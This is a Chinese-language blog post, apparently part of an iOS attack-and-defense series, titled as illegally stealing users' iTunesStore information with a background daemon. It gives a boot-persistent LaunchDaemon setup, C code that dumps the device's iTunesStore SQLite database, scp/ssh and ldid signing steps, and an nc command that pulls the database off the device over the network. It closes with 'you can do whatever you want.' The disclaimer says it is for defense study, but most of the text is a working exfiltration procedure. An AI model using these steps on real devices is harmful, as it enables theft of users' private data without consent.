後臺 daemon 非法竊取使用者 iTunesstore 資訊

weixin_34290000發表於2017-05-06

本人鄭重宣告:並不鼓勵竊取使用者隱私等行為,一切 hack 學習都只是為了研究如何防禦。OK,進入正題。

開機自啟動

在 iOS 安全攻防(一):Hack必備的命令與工具中,介紹瞭如何編譯自己的 C 程式並手動啟動。今天介紹如何使程式變為開機自啟動。

首先開啟 Xcode 建立一個 plist 屬性檔案


4130994-8bcf6b434dce2262.png

其中要注意一下通訊服務名,我定為 55 。用編輯器開啟,即為:


4130994-b8eb8e38abec63f3.png

最後,將 plist 檔案 scp 至 root@192.168.1.114:/System/Library/LaunchDaemons/下 。

編寫讀取 iTunesstore 資料庫程式

讀取 itunesstored2.sqlitedb 資訊,並輸出到 stdout 中,便於我們讀取。

#include#include#include#define FILE "/var/mobile/Library/com.apple.itunesstored/itunesstored2.sqlitedb"

int main(){

int fd = open(FILE, O_RDONLY);

char buf[128];

int ret = 0;

if(fd < 0)

return -1;

while (( ret = read(fd, buf, sizeof(buf))) > 0){

write( fileno(stdout), buf, ret);

}

close(fd);

return 0;

}

編譯、拷貝、簽名

編譯方法上篇文章已經介紹清楚,這裡不再重複,直接 ¥%¥#%¥……%# 生成執行在 ARM 的 ncdemo

將 ncdemo scp 到裝置中,並登入

$ scp ncdemo root@192.168.1.114:ncdemo

$ ssh root@192.168.1.114

簽名

#ldid -S ncdemo

#mv ncdemo /usr/bin

抓取 iTunesstore 資料資訊

這時,我們只需要利用 netcat,指定之前定義的服務名稱,輕鬆在本地抓取裝置 iTunesstore 資訊. 

$ nc 192.168.1.114 55 > itunesstored2.sqlitedb

分析 iTunesstore 資料資訊

好吧,這裡就介紹個最簡單的應用,利用string命令檢視: $ strings itunesstored2.sqlitedb

於是乎,我們就清晰的得到了 iPhone/iPad 裝置上都安裝了哪些 app :


4130994-b67a902741ea562e.png
當然,除了這些,你想幹什麼都可以

相關文章